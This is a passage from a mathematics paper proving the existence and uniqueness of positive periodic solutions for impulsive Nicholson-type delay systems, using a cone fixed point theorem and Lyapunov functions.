$$ (1.3) where \(\alpha_{i}(t),\beta_{i}(t),c_{ij}(t),\gamma_{ij}(t),\tau_{ij}(t)\in C([0,\infty),(0,\infty))\), \(i=1,2\), \(j=1,2,\ldots,m\). \(\triangle y_{i}(t_{k})=y_{i}(t^{+}_{k})-y_{i}(t^{-}_{k})\) are the impulses at moments \(t_{k}\). In Equation (1.3), we shall use the following hypotheses: (H1):  \(0< t_{0}< t_{1}< t_{2}< \cdots\), \(t_{i}\), \(i=1,2,\ldots\) are fixed impulsive points with \(\lim_{k\rightarrow\infty}t_{k}=\infty\); (H2):  \(\{b_{k}\}\) is a real sequence, and \(b_{k}>-1\), \(k=1,2,\ldots\) ; (H3):  \(\alpha_{i}(t)\), \(\beta_{i}(t)\), \(c_{ij}(t)\), \(\gamma_{ij}(t)\), \(\tau_{ij}(t)\), and \(\prod_{0< t_{k}< t}(1+b_{k})\) are periodic functions with common period \(\omega>0\), \(i=1,2\), \(j=1,2,\ldots,m\), \(k=1,2,\ldots\) . Here and in the sequel, we assume that a product equals unit if the number of factors is equal to zero. Let \(\tau=\max\{\tau_{ij}^{+}\}\), \(\tau_{ij}^{+}=\max_{0\leq t\leq\omega}\tau_{ij}(t)\), \(i=1,2\), \(j=1,2,\ldots,m\). If \(y_{i}(t)\) is defined on \([t_{0}-\tau, \sigma]\) with \(t_{0}, \sigma\in R\), then we define \(y_{t}\in C([-\tau, 0], R)\) as \(y_{t}=(y_{t}^{1}, y_{t}^{2})\) where \(y_{t}^{i}(\theta)=y_{i}(t+\theta)\) for \(\theta\in[-\tau,0]\) and \(i=1,2\). Due to the biological interpretation of system (1.3), only positive solutions are meaningful and admissible. Thus, we shall only consider the admissible initial conditions: $$ y_{i_{t_{0}}}(s)=\varphi_{i}(s), \quad s\in[-\tau,0], $$ (1.4) where \(\varphi_{i}(s)\in C([-\tau,0],(0,\infty))\). We write \(y(t)=y_{t}(t_{0},\varphi)\) for a solution of the initial value problems (1.3) and (1.4). The remaining parts of this paper is organized as follows. In Section 2, we introduce some notation, definitions, and lemmas. In Section 3, we first establish the equivalence between the solution (or positive periodic solution) of a Nicholson-type delay system with impulses and that of the corresponding Nicholson-type delay system without impulses. Then, we give some criteria ensuring the existence and uniqueness of positive periodic solutions of Nicholson-type delay systems with and without impulses. In Section 4, an example and its simulation are provided to illustrate our results obtained in the previous sections. Finally, some conclusions are drawn in Section 5. 2 Preliminaries For convenience, in the following discussion, we always use the notation $$\begin{aligned} g^{-}=\min_{0\leq t\leq\omega}g(t),\qquad g^{+}=\max _{0\leq t\leq\omega}g(t), \end{aligned}$$ where g is a continuous ω-periodic function defined on R. Definition 2.1 A function \(y(t)=(y_{1}(t),y_{2}(t))^{T}\) defined on \([t_{0}-\tau,\infty)\) is said to be a solution of Equation (1.3) with initial condition (1.4) if 1. (i) \(y(t)\) is absolutely continuous on the intervals \((t_{0},t_{1}]\) and \((t_{k},t_{k+1}]\), \(k=1,2,\ldots\) ;   2. (ii) for all \(t_{k}\), \(k=1,2,\ldots\) , \(y(t_{k}^{+})\) and \(y(t_{k}^{-})\) exist, and \(y(t_{k}^{-})=y(t_{k})\);   3. (iii) \(y(t)\) satisfies the differential equation of (1.3) in \([t_{0},\infty) \backslash\{t_{k}\}\) and the impulsive conditions for all \(t=t_{k}\), \(k=1,2,\ldots\) ;   4. (iv) \(y_{i_{t_{0}}}(s)=\varphi_{i}(s)\), \(s\in[-\tau,0]\).   Under hypotheses (H1)-(H3), we consider the following Nicholson-type delay systems without impulsive effects: $$ \left \{ \textstyle\begin{array}{@{}l} x'_{1}(t) =-\alpha_{1}(t)x_{1}(t)+\beta_{1}(t)x_{2}(t)+\sum_{j=1}^{m} p_{1j}(t)x_{1}(t-\tau_{1j}(t))e^{-q_{1j}(t)x_{1}(t-\tau_{1j}(t))},\\ x'_{2}(t) =-\alpha_{2}(t)x_{2}(t)+\beta_{2}(t)x_{1}(t)+\sum_{j=1}^{m} p_{2j}(t)x_{2}(t-\tau_{2j}(t))e^{-q_{2j}(t)x_{2}(t-\tau_{2j}(t))},\\ \quad t\geq t_{0}>0, \end{array}\displaystyle \right . $$ (2.1) with initial conditions $$ x_{i_{t_{0}}}(s)=\varphi_{i}(s) \quad\mbox{for } s\in[-\tau,0], \varphi \in C \bigl([-\tau,0],(0,\infty) \bigr), $$ (2.2) where $$p_{ij}(t)=\prod_{t-\tau_{ij}(t)\leq t_{k}< t}(1+b_{k})^{-1}c_{ij}(t) \quad\mbox{and}\quad q_{ij}(t)=\prod_{0< t_{k}< t-\tau_{ij}(t)}(1+b_{k}) \gamma_{ij}(t), $$ \(i=1,2\), \(j=1,2,\ldots,m\). By a solution \(x(t)\) of Equation (2.1) with initial condition (2.2) we mean an absolutely continuous function \(x(t)=(x_{1}(t),x_{2}(t))^{T}\) defined on \([t_{0},\infty)\) satisfying Equation (2.1) for \(t\geq t_{0}\) and initial condition (2.2) on \([-\tau,0]\). Similarly to the method of [18], we have the following: Lemma 2.1 Assume that (H1)-(H3) hold. Then (i) if \(x(t)=(x_{1}(t),x_{2}(t))^{T}\) is a solution (or positive ω-periodic solution) of Equation (2.1) with initial condition (2.2), then \(y(t)=(\prod_{0< t_{k}< t}(1+b_{k})x_{1}(t),\prod_{0< t_{k}< t}(1+b_{k})x_{2}(t))^{T}\) is a solution (or positive ω-periodic solution) of Equation (1.3) with initial condition (1.4) on \([-\tau,\infty)\); (ii) if \(y(t)=(y_{1}(t),y_{2}(t))^{T}\) is a solution (or positive ω-periodic solution) of Equation (1.3) with initial condition (1.4), then \(x(t)=(\prod_{0< t_{k}< t}(1+b_{k})^{-1}y_{1}(t), \prod_{0< t_{k}< t}(1+b_{k})^{-1}y_{2}(t))^{T}\) is a solution (or positive ω-periodic solution) of Equation (2.1) with initial condition (2.2) on \([-\tau,\infty)\). Proof (i) If \(x(t)=(x_{1}(t),x_{2}(t))^{T}\) is a solution (or positive ω-periodic solution) of Equation (2.1) on \([t_{0},\infty)\), then it is easy to see that \(y(t)\) is absolutely continuous on all intervals \((t_{0},t_{1}]\) and \((t_{k},t_{k+1}]\), \(k=1,2,\ldots\) , and for any \(t\neq t_{k}\), $$\begin{aligned} &y'_{1}(t)+\alpha_{1}(t)y_{1}(t)- \beta_{1}(t)y_{2}(t)-\sum_{j=1}^{m} c_{1j}(t)y_{1}\bigl(t-\tau_{1j}(t) \bigr)e^{-\gamma_{1j}(t)y_{1}(t-\tau_{1j}(t))} \\ &\quad=\prod_{0< t_{k}< t}(1+b_{k})x'_{1}(t)+ \alpha _{1}(t)\prod_{0< t_{k}< t}(1+b_{k})x_{1}(t)- \beta_{1}(t)\prod_{0< t_{k}< t}(1+b_{k})x_{2}(t) \\ &\qquad{} -\sum_{j=1}^{m}c_{1j}(t) \prod_{0< t_{k}< t-\tau_{1j}(t)} (1+b_{k})x_{1} \bigl(t-\tau_{1j}(t)\bigr)e^{-\gamma _{1j}(t)\prod _{0< t_{k}< t-\tau_{1j}(t)}(1+b_{k})x_{1}(t-\tau _{1j}(t))} \\ &\quad=\prod_{0< t_{k}< t}(1+b_{k}) \Biggl[x'_{1}(t)+\alpha _{1}(t)x_{1}(t)- \beta_{1}(t)x_{2}(t) \\ &\qquad{} -\sum_{j=1}^{m}c_{1j}(t) \prod_{t-\tau _{1j}(t)\leq t_{k}< t}(1+b_{k})^{-1}x_{1} \bigl(t-\tau_{1j}(t)\bigr)e^{-\gamma _{1j}(t)\prod _{0< t_{k}< t-\tau_{1j}(t)}(1+b_{k})x_{1}(t-\tau_{1j}(t))}\Biggr] \\ &\quad=\prod_{0< t_{k}< t}(1+b_{k}) \Biggl[x'_{1}(t)+\alpha _{1}(t)x_{1}(t)- \beta_{1}(t)x_{2}(t) \\ &\qquad{}-\sum_{j=1}^{m}p_{1j}(t)x_{1} \bigl(t-\tau _{1j}(t)\bigr)e^{-q_{1j}(t)x_{1}(t-\tau_{1j}(t))}\Biggr] \\ &\quad=0. \end{aligned}$$ (2.3) Similarly, we have $$ y'_{2}(t)+\alpha_{2}(t)y_{2}(t)- \beta_{2}(t)y_{1}(t)-\sum_{j=1}^{m} c_{2j}(t)y_{2}\bigl(t-\tau_{2j}(t) \bigr)e^{-\gamma_{2j}(t)y_{2}(t-\tau_{2j}(t))}=0. $$ (2.4) On the other hand, for every \(t=t_{k}\), \(k=1,2,\ldots\) , and \(t_{k}\) situated in \([0,\infty)\), $$y_{i} \bigl(t_{k}^{+} \bigr)=\lim _{t\rightarrow t_{k}^{+}}\prod_{0< t_{j}< t}(1+b_{j})x_{i}(t)= \prod_{0< t_{j}\leq t_{k}}(1+b_{j})x_{i}(t_{k}), \quad i=1,2, $$ and $$y_{i}(t_{k})=\prod_{0< t_{j}< t_{k}}(1+b_{j})x_{i}(t_{k}), \quad i=1,2. $$ Thus, for every \(t=t_{k}\), \(k=1,2,\ldots\) , $$ y_{i}\bigl(t_{k}^{+}\bigr)=(1+b_{k})y_{i}(t_{k}), \quad i=1,2. $$ (2.5) Therefore, we arrive at the conclusion that \(y(t)\) is the solution (or positive ω-periodic solution) of Equation (1.3) with initial condition (1.4). In fact, if \(x(t)\) is the solution (or positive ω-periodic solution) of Equation (2.1) with initial condition (2.2), then \(y_{i}(t)=\prod_{0< t_{k}< t}(1+b_{k})x_{i}(t)=x_{i}(t)=\varphi_{i}(t)\) on \([-\tau, 0]\), \(i=1,2\). (ii) Since \(y(t)=(y_{1}(t),y_{2}(t))^{T}\) is a solution (or positive ω-periodic solution) of Equation (1.3) with initial condition (1.4), it follows that \(y(t)\) is absolutely continuous on all intervals \((t_{0},t_{1}]\) and \((t_{k},t_{k+1}]\), \(k=1,2,\ldots\) . Therefore, \(x_{i}(t)=\prod_{0< t_{k}< t}(1+b_{k})^{-1}y_{i}(t)\) is absolutely continuous on all intervals \((t_{0},t_{1}]\) and \((t_{k},t_{k+1}]\), \(k=1,2,\ldots\) . Moreover, it follows that, for any \(t=t_{k}\), \(k=1,2,\ldots\) , $$\begin{aligned} x_{i}\bigl(t_{k}^{+}\bigr)&=\lim _{t\rightarrow t_{k}^{+}}\prod_{0< t_{j}< t}(1+b_{j})^{-1}y_{i}(t) \\ &=\prod_{0< t_{j}\leq t_{k}}(1+b_{j})^{-1}y_{i} \bigl(t_{k}^{+}\bigr)= \prod_{0< t_{j}< t_{k}}(1+b_{j})^{-1}y_{i}(t_{k})=x_{i}(t_{k}) \end{aligned}$$ (2.6) and $$\begin{aligned} x_{i}\bigl(t_{k}^{-}\bigr)&=\lim _{t\rightarrow t_{k}^{-}}\prod_{0< t_{j}< t}(1+b_{j})^{-1}y_{i}(t) \\ &=\prod_{0< t_{j}< t_{k}}(1+b_{j})^{-1}y_{i} \bigl(t_{k}^{-}\bigr)= \prod_{0< t_{j}< t_{k}}(1+b_{j})^{-1}y_{i}(t_{k})=x_{i}(t_{k}), \quad i=1,2, \end{aligned}$$ (2.7) which implies that \(x(t)\) is continuous and easy to prove absolutely continuous on \([0,\infty)\). Now, similarly to the proof in case (i), we can easily check that \(x(t)=\prod_{0< t_{k}< t}(1+b_{k})^{-1}y(t)\) is a solution (or positive ω-periodic solution) of Equation (2.1) with initial condition (2.2) on \([-\tau, \infty]\). From the above analysis we know that the conclusion of Lemma 2.1 is true. This completes the proof. □ Lemma 2.2 Suppose that (H4):  \(\frac{\beta_{1}^{+}\beta_{2}^{+}}{\alpha_{1}^{-}\alpha _{2}^{-}}<1\). Then every solution \(x(t)\) of Equation (2.1) with (2.2) and every solution \(y(t)\) of Equation (1.3) with (1.4) are positive and bounded on \([t_{0},\infty)\). Proof Clearly, by Lemma 2.1, we only need to prove that every solution \(x(t)\) of Equation (2.1) with (2.2) is positive and bounded on \([t_{0},\infty)\). In order to show that, we only need to see Lemma 2.3 in [11]. Furthermore, from the proof of Lemma 2.3 in [11] we also obtain the following conclusions: Under the condition (H4), for every solution \(x(t)=(x_{1}(t),x_{2}(t))^{T}\) of Equation (2.1) with (2.2), when \(t>t_{0}\), $$ \begin{aligned}[b] \max_{t_{0}\leq s \leq t}{x_{1}(s)}\leq{}&\biggl(1-\frac{\beta _{1}^{+}\beta_{2}^{+}}{\alpha_{1}^{-}\alpha_{2}^{-}} \biggr)^{-1} \\ &{}\times\Biggl[\varphi_{1}(0)+\sum _{j=1}^{m}\frac{p_{1j}^{+}}{\alpha _{1}^{-}q_{1j}^{-}e}+\frac{\beta_{1}^{+}}{\alpha_{1}^{-}} \Biggl( \varphi_{2}(0)+\sum_{j=1}^{m} \frac{p_{2j}^{+}}{\alpha _{2}^{-}q_{2j}^{-}e}\Biggr)\Biggr]\triangleq b_{1} \end{aligned} $$ (2.8) and $$\begin{aligned} \max_{t_{0}\leq s \leq t}{x_{2}(s)}\leq{}&\biggl(1-\frac{\beta _{1}^{+}\beta_{2}^{+}}{\alpha_{1}^{-}\alpha_{2}^{-}} \biggr)^{-1} \\ &{}\times \Biggl[\varphi_{2}(0)+\sum _{j=1}^{m}\frac{p_{2j}^{+}}{\alpha _{2}^{-}q_{2j}^{-}e}+\frac{\beta_{2}^{+}}{\alpha_{2}^{-}} \Biggl( \varphi_{1}(0)+\sum_{j=1}^{m} \frac{p_{1j}^{+}}{\alpha _{1}^{-}q_{1j}^{-}e}\Biggr)\Biggr]\triangleq b_{2}. \end{aligned}$$ (2.9)  □ Lemma 2.3 (Cone fixed point theorem [19]) Suppose that \(\Omega_{1}\), \(\Omega_{2}\) are open bounded subsets in Banach space X, and \(\theta\in\Omega_{1}\), \(\overline{\Omega_{1}}\subset\Omega_{2}\). Let P be a cone in X, and \(T:P\cap(\overline{\Omega_{2}}\setminus \Omega_{1})\rightarrow P\) be a completely continuous operator. If 1. (i) \(\|Tx\|\leq\|x\|\) for \(x\in P\cap\partial\Omega_{1}\) and \(\|Tx\|\geq\|x\|\) for \(x\in P\cap\partial\Omega_{2}\), or   2. (ii) \(\|Tx\|\leq\|x\|\) for \(x\in P\cap\partial\Omega_{2}\) and \(\|Tx\|\geq\|x\|\) for \(x\in P\cap\partial\Omega_{1}\),   then the operator T has at least one fixed point in \(P\cap (\overline{\Omega_{2}}\setminus\Omega_{1})\). 3 Existence and uniqueness of positive periodic solution For ease of exposition, throughout this paper, we adopt the following notation: $$\begin{aligned} |x_{i}|_{\infty}=\max_{0\leq t\leq\omega}\bigl|x_{i}(t)\bigr|, \qquad x(t)= \bigl(x_{1}(t),x_{2}(t) \bigr)^{T}, \quad i=1,2. \end{aligned}$$ We denote by X the set of all continuously ω-periodic functions \(x(t)\) defined on R, i.e., \(X=\{ x(t)|x(t)=(x_{1}(t),x_{2}(t))^{T}\in C(R, R^{2}), x(t+\omega)=x(t)\} \), and denote $$\|x\|=\max\bigl\{ |x_{1}|_{\infty},|x_{2}|_{\infty}\bigr\} . $$ Then, X endowed with the norm \(\|x\|\) is a Banach space. Let P be the cone of X defined by \(P=\{ x(t)\in X| x(t)\geq0, t\in[t_{0}, t_{0}+\omega]\}\). Define the operator T by $$ (Tx) (t)= \begin{pmatrix} \int_{t}^{t+\omega}G_{1}(t,s)[\beta_{1}(s)x_{2}(s)+\sum_{j=1}^{m} p_{1j}(s)x_{1}(s-\tau_{1j}(s))e^{-q_{1j}(s)x_{1}(s-\tau _{1j}(s))}]\,ds\\ \int_{t}^{t+\omega}G_{2}(t,s)[\beta_{2}(s)x_{1}(s)+\sum_{j=1}^{m} p_{2j}(s)x_{2}(s-\tau_{2j}(s))e^{-q_{2j}(s)x_{2}(s-\tau_{2j}(s))}]\,ds \end{pmatrix}, $$ (3.1) where $$G_{1}(t,s)=\frac{e^{\int_{t}^{s}\alpha_{1}(u)\,du}}{e^{\int_{0}^{\omega }\alpha_{1}(u)\,du}-1},\qquad G_{2}(t,s)= \frac{e^{\int_{t}^{s}\alpha _{2}(u)\,du}}{e^{\int_{0}^{\omega}\alpha_{2}(u)\,du}-1}, \quad s\in [t,t+\omega]. $$ It is easy to check that Equation (2.1) has positive ω-periodic solution if and only if the operator T has a fixed point in \(P^{0}=\{x(t)\in X| x(t)>0, t\in[t_{0}, t_{0}+\omega]\}\). In addition, we have \(0< N_{i}\triangleq \frac{1}{e^{\int_{0}^{\omega}\alpha_{i}(u)\,du}-1}=G_{i}(t,t)\leq G_{i}(t,s) \leq G_{i}(t,t+\omega)=\frac{e^{\int_{0}^{\omega}\alpha_{i}(u)\,du}}{e^{\int _{0}^{\omega}\alpha_{i}(u)\,du}-1} \triangleq M_{i}\), \(i=1,2\). Lemma 3.1 Assume that (H1)-(H4) hold. Then \(T:P\rightarrow P\) is completely continuous. Proof First, we prove \(T:P\rightarrow P\). From (H3) we know that \(\alpha_{i}(t)\), \(i=1,2\), are continuous ω-periodic functions. Further, we find $$ G_{i}(t+\omega,s+\omega)=G_{i}(t,s), \quad s\in[t,t+\omega]. $$ (3.2) In view of (H3), (3.1), (3.2), and the definition of P, for any \(x\in P\) and \(t\in R\), we have $$\begin{aligned} (Tx)_{1}(t+\omega) =& \int_{t+\omega}^{t+2\omega}G_{1}(t+\omega,s) \Biggl[ \beta _{1}(s)x_{2}(s)+\sum_{j=1}^{m} p_{1j}(s)x_{1} \bigl(s-\tau _{1j}(s) \bigr)e^{-q_{1j}(s)x_{1}(s-\tau_{1j}(s))} \Biggr]\,ds \\ =& \int_{t}^{t+\omega}G_{1}(t+\omega,u+\omega) \Biggl[\beta_{1}(u+\omega )x_{2}(u+\omega)\\ &{}+\sum _{j=1}^{m} p_{1j}(u+\omega)x_{1} \bigl(u+\omega-\tau _{1j}(u+\omega) \bigr) e^{-q_{1j}(u+\omega)x_{1}(u+\omega-\tau_{1j}(u+\omega))} \Biggr]\,du \\ =& \int_{t}^{t+\omega}G_{1}(t,u) \Biggl[ \beta_{1}(u)x_{2}(u)+\sum_{j=1}^{m} p_{1j}(u)x_{1} \bigl(u-\tau_{1j}(u) \bigr)e^{-q_{1j}(u)x_{1}(u-\tau_{1j}(u))} \Biggr]\,du \\ =&(Tx)_{1}(t). \end{aligned}$$ Similarly, we have $$(Tx)_{2}(t+\omega)=(Tx)_{2}(t). $$ In addition, it is clear that \(Tx\in C(R,R^{2})\) and \((Tx)(t)\geq0\) for any \(x\in P\), \(t\in R\). Hence, \(Tx\in P\) for any \(x\in P\). Thus, \(T:P\rightarrow P\). Second, we show that \(T:P\rightarrow P\) is completely continuous. Obviously, \(T:P\rightarrow P\) is continuous. Since \(\sup_{u\geq0}ue^{-u}=\frac{1}{e}\), by (2.8) and (2.9), for any \(x\in P\) and \(t\in[t_{0},t_{0}+\omega]\), we have $$\begin{aligned} (Tx)_{1}(t)&= \int_{t}^{t+\omega}G_{1}(t,s)\Biggl[\beta _{1}(s)x_{2}(s)+\sum_{j=1}^{m} p_{1j}(s)x_{1}\bigl(s-\tau _{1j}(s) \bigr)e^{-q_{1j}(s)x_{1}(s-\tau_{1j}(s))}\Biggr]\,ds \\ &\leq M_{1} \int_{0}^{\omega}\Biggl[\beta_{1}(s)x_{2}(s)+ \sum_{j=1}^{m} p_{1j}(s)x_{1} \bigl(s-\tau_{1j}(s)\bigr)e^{-q_{1j}(s)x_{1}(s-\tau_{1j}(s))}\Biggr]\,ds \\ &\leq M_{1}\omega\Biggl[\beta_{1}^{+}b_{2}+ \sum_{j=1}^{m}\frac {p_{1j}^{+}}{q_{1j}^{-}e}\Biggr] \triangleq{B_{1}} \end{aligned}$$ (3.3) and $$\begin{aligned} (Tx)_{2}(t)&= \int_{t}^{t+\omega}G_{2}(t,s)\Biggl[\beta _{2}(s)x_{1}(s)+\sum_{j=1}^{m} p_{2j}(s)x_{2}\bigl(s-\tau _{2j}(s) \bigr)e^{-q_{2j}(s)x_{2}(s-\tau_{2j}(s))}\Biggr]\,ds \\ &\leq M_{2} \int_{0}^{\omega}\Biggl[\beta_{2}(s)x_{1}(s)+ \sum_{j=1}^{m} p_{2j}(s)x_{2} \bigl(s-\tau_{2j}(s)\bigr)e^{-q_{2j}(s)x_{2}(s-\tau_{2j}(s))}\Biggr]\,ds \\ &\leq M_{2}\omega\Biggl[\beta_{2}^{+}b_{1}+ \sum_{j=1}^{m}\frac {p_{2j}^{+}}{q_{2j}^{-}e}\Biggr] \triangleq{B_{2}}. \end{aligned}$$ (3.4) Moreover, $$\begin{aligned} \bigl|(Tx)'_{1}(t)\bigr|={}&\Biggl|G_{1}(t,t+ \omega)\Biggl[\beta_{1}(t+\omega )x_{2}(t+\omega)+\sum _{j=1}^{m} p_{1j}(t+ \omega)x_{1}\bigl(t+\omega-\tau _{1j}(t+\omega)\bigr) \\ &{}\times e^{-q_{1j}(t+\omega)x_{1}(t+\omega -\tau_{1j}(t+\omega))}\Biggr] \\ &{}-G_{1}(t,t)\Biggl[ \beta_{1}(t)x_{2}(t)+\sum_{j=1}^{m} p_{1j}(t)x_{1}\bigl(t-\tau_{1j}(t) \bigr)e^{-q_{1j}(t)x_{1}(t-\tau_{1j}(t))}\Biggr] \\ &{} -\alpha_{1}(t) \int_{t}^{t+\omega }G_{1}(t,s)\Biggl[ \beta_{1}(s)x_{2}(s)+\sum_{j=1}^{m} p_{1j}(s)x_{1}\bigl(s-\tau _{1j}(s) \bigr)e^{-q_{1j}(s)x_{1}(s-\tau_{1j}(s))}\Biggr]\,ds\Biggr| \\ ={}&\Biggl|-\alpha_{1}(t) (Ax)_{1}(t)+\Biggl[\beta _{1}(t)x_{2}(t)+\sum_{j=1}^{m} p_{1j}(t)x_{1}\bigl(t-\tau _{1j}(t) \bigr)e^{-q_{1j}(t)x_{1}(t-\tau_{1j}(t))}\Biggr]\Biggr| \\ \leq&{}\alpha_{1}^{+}B_{1}+\beta_{1}^{+}b_{2}+ \sum_{j=1}^{m}\frac{p_{1j}^{+}}{q_{1j}^{-}e}. \end{aligned}$$ (3.5) Similarly, we have $$ \bigl|(Tx)'_{2}(t)\bigr| \leq\alpha_{2}^{+}B_{2}+ \beta_{2}^{+}b_{1}+\sum _{j=1}^{m}\frac {p_{2j}^{+}}{q_{2j}^{-}e}. $$ (3.6) In view of (3.3)-(3.6), \(\{Tx:x\in P\}\) is a family of uniformly bounded and equicontinuous functions on \([t_{0},t_{0}+\omega]\). By the Ascoli-Arzela theorem, \(T:P\rightarrow P\) is compact. Therefore, \(T:P\rightarrow P\) is completely continuous. The proof of Lemma 3.1 is complete. □ Theorem 3.1 Assume that (H1)-(H4) hold. Then Equation (1.3) with (1.4) has at least one positive ω-periodic solution. Proof By (3.3) and (3.4), for any \(x\in P \) and \(t>t_{0}\), we have $$(Tx)_{1}(t)\leq B_{1} \quad\mbox{and}\quad (Tx)_{2}(t)\leq B_{2}. $$ Therefore, $$ \|Tx\|\leq\max\{B_{1}, B_{2}\}\triangleq B>0. $$ (3.7) For any \(x\in P\) and \(t>t_{0}\), we have $$\begin{aligned} (Tx)_{1}(t)&= \int_{t}^{t+\omega}G_{1}(t,s)\Biggl[\beta _{1}(s)x_{2}(s)+\sum_{j=1}^{m} p_{1j}(s)x_{1}\bigl(s-\tau _{1j}(s) \bigr)e^{-q_{1j}(s)x_{1}(s-\tau_{1j}(s))}\Biggr]\,ds \\ &\geq N_{1} \int_{0}^{\omega}\Biggl[\beta_{1}(s)x_{2}(s) +\sum_{j=1}^{m} p_{1j}(s)x_{1} \bigl(s-\tau_{1j}(s)\bigr)e^{-q_{1j}(s)x_{1}(s-\tau _{1j}(s))}\Biggr]\,ds. \end{aligned}$$ (3.8) Let \(\tau^{-}=\min_{j=1,2,\ldots,m}\{\tau_{1j}^{-},\tau_{2j}^{-}\} \). There are two possible cases to consider. Case 1. \(\tau^{-}\geq\omega\). In view of (3.8), we have $$\begin{aligned} (Tx)_{1}(t) \geq& N_{1} \int_{0}^{\omega} \Biggl[\sum _{j=1}^{m} p_{1j}(s)x_{1} \bigl(s- \tau _{1j}(s) \bigr)e^{-q_{1j}(s)x_{1}(s-\tau_{1j}(s))} \Biggr]\,ds \\ \geq& N_{1} \omega\sum_{j=1}^{m} p_{1j}^{-}\varphi_{1}^{-} e^{-q_{1j}^{+}\varphi_{1}^{+}}\triangleq A_{11}>0, \end{aligned}$$ where \(\varphi_{1}^{-}=\min_{-\tau\leq s\leq0}\varphi_{1}(t)\), \(\varphi_{1}^{+}=\max_{-\tau\leq s\leq0}\varphi_{1}(t)\). Case 2. \(\tau^{-}< \omega\). In view of (3.8), we have $$\begin{aligned} (Tx)_{1}(t) \geq& N_{1} \int_{0}^{\tau^{-}} \Biggl[\sum _{j=1}^{m} p_{1j}(s)x_{1} \bigl(s- \tau _{1j}(s) \bigr)e^{-q_{1j}(s)x_{1}(s-\tau_{1j}(s))} \Biggr]\,ds \\ \geq& N_{1} \tau^{-} \sum_{j=1}^{m} p_{1j}^{-}\varphi_{1}^{-} e^{-q_{1j}^{+}\varphi_{1}^{+}}\triangleq A_{12}>0. \end{aligned}$$ Therefore, $$(Tx)_{1}(t)\geq\min\{A_{11}, A_{12}\}\triangleq A_{1}>0. $$ Similarly, we have $$(Tx)_{2}(t)\geq\min\{A_{21}, A_{22}\}\triangleq A_{2}>0, $$ where \(A_{21}=N_{2} \omega\sum_{j=1}^{m} p_{2j}^{-}\varphi_{2}^{-} e^{-q_{2j}^{+}\varphi_{2}^{+}}\), \(A_{22}=N_{2} \tau^{-} \sum_{j=1}^{m} p_{2j}^{-}\varphi_{2}^{-} e^{-q_{2j}^{+}\varphi_{2}^{+}}\), \(\varphi_{2}^{-}=\min_{-\tau\leq s\leq0}\varphi_{2}(t)\), \(\varphi_{2}^{+}=\max_{-\tau\leq s\leq0}\varphi_{2}(t)\). Then, for any \(x\in P\) and \(t>t_{0}\), $$ \|Tx\|\geq\min\{A_{1}, A_{2}\}\triangleq A>0. $$ (3.9) Let $$\Omega_{1}=\bigl\{ x\in X: \|x\|< A\bigr\} $$ and $$\Omega_{2}=\bigl\{ x\in X: \|x\|< B\bigr\} . $$ Clearly, \(\Omega_{1}\) and \(\Omega_{2}\) are open bounded subsets in X, and \(\theta\in X\), \(\overline{\Omega_{1}}\subset\Omega_{2}\). By Lemma 3.1, \(T:P\cap (\overline{\Omega_{2}} \setminus\Omega_{1}) \rightarrow P\) is completely continuous. If \(x\in P\cap\partial\Omega_{2}\), which implies that \(\|x\|=B\), then from (3.7) we have \(\|Tx\|\leq B\), and hence \(\|Tx\|\leq\|x\|\) for \(x\in P\cap\partial\Omega_{2}\). If \(x\in P\cap\partial\Omega_{1}\), which implies that \(\|x\|=A\), then from (3.9) we have \(\|Tx\|\geq A\), and hence \(\|Tx\|\geq\|x\|\) for \(x\in P\cap\partial\Omega_{1}\). By Lemma 2.3 the operator T has at least one fixed point in \(P\cap(\overline{\Omega_{2}} \setminus\Omega_{1})\), i.e., Equation (2.1) with (2.2) has at least one ω-periodic solution. Since \(\theta \overline{\in} P\cap(\overline{\Omega_{2}} \setminus\Omega_{1})\), Equation (2.1) with (2.2) has at least one positive ω-periodic solution. Therefore, Equation (1.3) with (1.4) has at least one positive ω-periodic solution by Lemma 2.1. This completes the proof of Theorem 3.1. □ Theorem 3.2 Let (H1)-(H4) hold. Suppose further that the following condition holds: (H5):  \(\alpha_{i}^{-}-\beta_{i}^{+}-\sum_{j=1}^{m} p_{ij}^{+}>0\), \(i=1,2\). Then Equation (1.3) with (1.4) has a unique positive ω-periodic solution. Proof By Theorem 3.1 we know that Equation (2.1) with (2.2) has at least one positive ω-periodic solution. Thus, in order to prove Theorem 3.2, we only need to prove the uniqueness of a positive ω-periodic solution for Equation (2.1) with (2.2). The following proof is similar to that of Theorem 3.2 in [11]. Assume that \(x(t)\) and \(\widetilde{x}(t)\) are two positive ω-periodic solutions of Equation (2.1). Set \(z_{i}(t)=x_{i}(t)-\widetilde{x}_{i}(t)\), where \(t\in[t_{0}-\tau, \infty)\), \(i=1,2\). Then $$ \left \{ \textstyle\begin{array}{@{}l} z'_{1}(t)=-\alpha_{1}(t)z_{1}(t)+\beta_{1}(t)z_{2}(t)+\sum_{j=1}^{m} p_{1j}(t)[x_{1}(t-\tau_{1j}(t))e^{-q_{1j}(t)x_{1}(t-\tau_{1j}(t))}\\ \hphantom{z'_{1}(t)=}{} -\widetilde{x}_{1}(t-\tau _{1j}(t))e^{-q_{1j}(t)\widetilde{x}_{1}(t-\tau_{1j}(t))}],\\ z'_{2}(t)=-\alpha_{2}(t)z_{2}(t)+\beta_{2}(t)z_{1}(t)+\sum_{j=1}^{m} p_{2j}(t)[x_{2}(t-\tau_{2j}(t))e^{-q_{2j}(t)x_{2}(t-\tau_{2j}(t))}\\ \hphantom{z'_{2}(t)=}{} -\widetilde{x}_{2}(t-\tau _{2j}(t))e^{-q_{2j}(t)\widetilde{x}_{2}(t-\tau_{2j}(t))}], \quad t\geq t_{0}>0. \end{array}\displaystyle \right . $$ (3.10) Set $$\Gamma_{i}(u)=- \bigl(\alpha_{i}^{-}-u \bigr)+ \beta_{i}^{+}+\sum_{j=1}^{m} p_{ij}^{+}e^{u\tau_{i}^{+}},\quad u\in[0,1], \tau_{i}^{+}= \max_{1\leq j\leq m} \tau_{ij}^{+}, i=1,2. $$ Clearly, \(\Gamma_{i}(u)\), \(i=1,2\), are continuous functions on \([0,1]\). From (H5) we have $$\Gamma_{i}(0)=-\alpha_{i}^{-}+ \beta_{i}^{+}+\sum_{j=1}^{m} p_{ij}^{+}< 0,\quad i=1,2. $$ Hence, we can choose two constants \(\eta>0\) and \(0< \lambda\leq1\) such that $$ \Gamma_{i}(\lambda)=\bigl(\lambda-\alpha_{i}^{-} \bigr)+\beta _{i}^{+}+\sum_{j=1}^{m} p_{ij}^{+}e^{\lambda\tau_{i}^{+}}< -\eta< 0,\quad i=1,2. $$ (3.11) Consider the Lyapunov functions $$V_{1}(t)=\bigl|z_{1}(t)\bigr|e^{\lambda t},\qquad 